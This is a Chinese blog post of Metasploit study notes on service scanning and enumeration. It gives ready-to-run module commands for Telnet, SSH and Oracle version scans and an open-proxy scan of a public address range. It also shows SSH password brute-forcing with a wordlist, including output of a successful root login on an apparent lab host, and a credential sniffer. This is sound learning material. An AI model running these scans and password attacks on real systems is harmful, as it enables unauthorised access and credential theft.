3.3服务扫描与查点

最新推荐文章于 2020-12-10 10:11:35 发布
最新推荐文章于 2020-12-10 10:11:35 发布
阅读量776 收藏
点赞数
分类专栏: metasploit日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012558785/article/details/40116933
版权


msf > search name:_version  服务查点辅助模块

一,常见的网络服务扫描
1.Telnet服务扫描
use auxiliary/scanner/telnet/telnet_version
set rhosts 10.10.10.0/24
set threads 100
run

无结果

2.ssh服务扫描
代替了telnet,具有安全性
use auxiliary/scanner/ssh/ssh_version
set rhosts 10.10.10.0/24
set threads 100
run

3.Oracle数据库服务查点
漏洞频发重灾区
Microsoft SQL Server 1433
Oracle SQL 监听器(tnslsnr) 1521
use auxiliary/scanner/oracle/tnslsnr_version
set threads 50
run

4.开放代理探测与利用
网络隐藏身份:代理服务器(proxy),VPN
open_proxy模块,获取免费的HTTP代理服务器地址
use auxiliary/scanner/http/open_proxy
set site www.google.com
set rhosts 24.25.24.1-24.25.24.254
set multiports true
set verify_connect true
set threads 100
run

更好的是vpn服务,可以自主架设OpenVPN


二,口令猜测与嗅探

1.ssh服务口令猜测

use auxiliary/scanner/ssh/ssh_login
set rhosts 10.10.10.254
set username root  (也可以用user_file)指定多个用户名
set pass_file /root/words.txt  (就在linux下的root里创建字典
(可以用userpass_file代替上面2个参数,用户口令字典)
set threads 50
run

10.10.10.254:22 SSH - Failed: 'root:123456'
[+] 10.10.10.254:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root)
Linux metasploitable 2.6.24-16-server #1
SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '

即获取了一台服务器访问权

2.psnuffle口令嗅探

截获常见协议的身份认证过程,讲用户名和口令信息记录下来
只有在能够接入对方网络的初始访问点
use auxiliary/sniffer/psnuffle
run

食源客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络查点-telnet、SSH网络查点
Goallegoal的博客
04-30 1210
网络查点 继网络踩点、扫描之后一项网络情报信息搜集技术,网络查点针对已知的弱点,对识别出来的服务进行更加充分更具针对性的探查,来寻找真正可以攻击的入口,以及攻击过程中可能需要的关键数据。 与网络踩点、扫描的区别 与网络踩点技术的关键区别:攻击者的入侵程度。 与网络扫描技术的关键区别:攻击者的针对性与信息搜集的目标性。 网络查点能够搜集到的信息看起来好像是无害的,但这些信息被细心的高水平攻击者所掌握...
服务扫描查点
新博客:https://aping-dev.com/
12-24 489
查看所有可用的服务查点模块search name:_version常用的网络服务扫描tennet服务扫描 可为下一步网络嗅探或口令猜测做好准备这里写代码片
_pass1.txt 跟_pass2.txt的作用
宁静致远,淡泊明志.
04-30 1599
    在编译完一个工程后,在%_WINCEROOT%下的会出现__pass1.txt和__pass2.txt两文件,里面全部是OS组件的环境变量:SYSGEN_AC3_FONT=1sysgen_accessib=1sysgen_agfa_font=1SYSGEN_ASYNCMAC=1sysgen_as_base=1sysgen_as_file=1SYSGEN_ATL=1...... 
【Metasploit总结】之【MSF常用命令及信息收集】
AA8j的博客
12-10 3775
初识MSF smfconsole常用命令 msfconsole下可以直接使用终端命令,如ping等 msfdb start # 启动msf数据库,msf数据库是使用的postgresql的5432端口,新版本的postgresql是5433无法使用,需要到/etc/postgresql/13/main/postgresql.conf下修改为5432端口 msfconsole -q # 启动msfconsole(-q为安静启动) db_status # 查看数据库状态,若显示no connect,先exit
nmbscan-1.2.6.tar.gz
04-09
nmbscan是一款开源的Linux工具,主要用于探测和扫描网络中的NetBIOS服务。它能够发现运行NetBIOS协议的主机,获取它们的共享资源和用户信息,这对于网络安全审计和故障排查具有极大的价值。nmbscan的最新版本为1.2.6...
通信网络安全与防护-课件-第4-6章-网络攻击技术、网络防护技术、网络安全协议PPT文档.pptx
最新发布
11-13
黑客攻击的过程可以归纳为以下9个步骤:踩点、扫描查点、获取访问权、权限提升、窃取、掩盖踪迹、创建后门、拒绝服务攻击。 踩点是指黑客攻击的准备阶段,包括收集目标系统或网络的信息、探测目标系统或网络的...
农用地土壤污染状况详查点位布设技术征-附件.doc
10-07
农用地土壤污染状况详查点位布设技术征-附件.doc 资源摘要信息中的农用地土壤污染状况详查点位布设技术征-附件.doc是一个详细的技术文件,旨在为农用地土壤污染状况的详查和点位布设提供技术指导。该文件的主要内容...
网络安全原理与应用:网络信息收集.pptx
05-16
3. 网络信息收集的技术:包括Web搜索、DNS查询、网络扫描、网络查点等,以及更具体的如端口扫描、漏洞扫描等。 掌握这些知识点对于提升网络安全防御能力和实施有效的攻击策略都至关重要。在实际操作中,必须遵守...
Java并发编程Callable与Future的应用实例代码
08-28
Java并发编程Callable与Future的应用实例代码 在Java并发编程中,Callable与Future是两个非常重要的概念,它们通常结合使用来实现异步编程。在本文中,我们将详细介绍Callable与Future的应用实例代码,并探究它们在...
渗透测试——情报收集阶段——服务扫描查点
YT的博客
02-03 1683
本文示例环境 很多网络服务是漏洞频发的高危对象,对网络上的特定服务进行扫描,往往能让我们少走弯路,增加渗透成功的几率。确定开放的端口后,通常会对相应端口上所运行服务的信息进行更深入的挖掘,这被称为服务查点。 在 Metasploit 的 Scanner 辅助模块中,有很多用于服务扫描查点的工具,这些工具通常以 [ service_name ] _version 和 [service_name...
metasploit学习3.2服务扫描查点
weixin_33950035的博客
04-25 129
一、对服务版本扫描msf>searchname:_version#扫描服务版本 msf>searchname:_login#口令猜解-------------------------------------------------------------------------------------------常用服务列表对T...
metasploit学习笔记之服务扫描查点
CODING...
01-04 2268
利用metasploit中的auxiliary/scanner/中的服务扫描模块,可以对靶机中的服务版本等信息进行扫描 1.Telnet服务扫描: telnet服务的常用端口是23 可以知道10.10.10.254这个机器中开启了telnet服务,并且其操作系统是ubuntu8.04 2.ssh服务扫描 ssh服务常用端口为22 再可以利用ssh_login模块进行SS
Metasploit学习笔记之——情报搜集
JochenZou的专栏
09-30 4601
1.情报搜集 1.1外围信息搜索 1.1.1通过DNS和IP地址挖掘目标网络信息 (1)whois域名注册信息查询(BT5、kali专有):root@kali:~# whois testfire.net  s (2)nslookup与dig域名查询(查询域名对应的IP地址):msf > nslookup
Metasploit渗透测试魔鬼训练营
qq_37340753的博客
12-26 8251
信息搜集外围情报搜集物理机有网状态下物理机无网状态下个人推测获取的信息主机探测与端口扫描活跃主机扫描ICMP Ping命令Metasploit的主机发现模块arp_sweep使用方法使用Nmap进行主机探测-sn选项扫描-Pn选项扫描-PU选项 外围情报搜集 物理机有网状态下 物理机无网状态下 个人推测 是由于需要向比较权威的DNS服务器访问,然后在相应的DNS服务器上读取相应的数据库,然后给...
Kail Linux渗透测试教程之在Metasploit中扫描
09-01 491
Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器。使用这些扫描器可以搜索并获得来自一台计算机或一个完整网...
4.15基于metasploit框架的web应用渗透技术
u012558785的专栏
10-15 1407
1.辅助模块 wmap Web扫描器 load wmap help wmap_sites -a http://202.112.50.74 wmap_sites -l msf > load wmap .-.-.-..-.-.-..---..---. | | | || | | || | || |-' `-----'`-'-'-'`-^-'`-' [WMAP 1.5.1] === 
可能是目前最详细的游戏运维指南
欧辰的专栏
07-11 7500
一直以来,中国网游在世界上都处于举足轻重的地位。从最早的端游到页游再到手游,不仅市场用户爆发式增长,近15年来网游技术的发展也是无比迅速。和单机游戏不同,网游除了游戏制作本身以外还牵涉到服务器端,再好的游戏如果出现链接、延迟等问题时也会造成巨大损失,这时候游戏运维便发挥了举足轻重的作用。中国网游的发展史,其实也是游戏运维的变革史,今天便由经典武侠手游《大掌门》运维掌门人吴启超来向我们讲述,进入游戏
Metasploit服务扫描(HTTP、MYSQL)
robacco的博客
03-19 934
利用Metasploit Scanner辅助模块自动化服务扫描 搜索你要扫描服务模块,然后使用该模块,这里以http为例: search http_version use auxiliary/scanner/http/http_version show options 接着设置目标的IP,即你要扫描的目标系统(可以是整个局域网下的所有主机),然后run一下,开始扫描,下面是扫描结果: ...
通信网络:攻防技术与协议详解
攻击过程被概括为九个步骤,包括踩点、扫描查点、获取访问权、权限提升、窃取数据、隐藏踪迹、建立后门和拒绝服务攻击(DoS/DDoS)。 2. 欺骗型攻击和社会工程学 - 这部分详细讨论了欺骗型攻击,如利用社会工程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值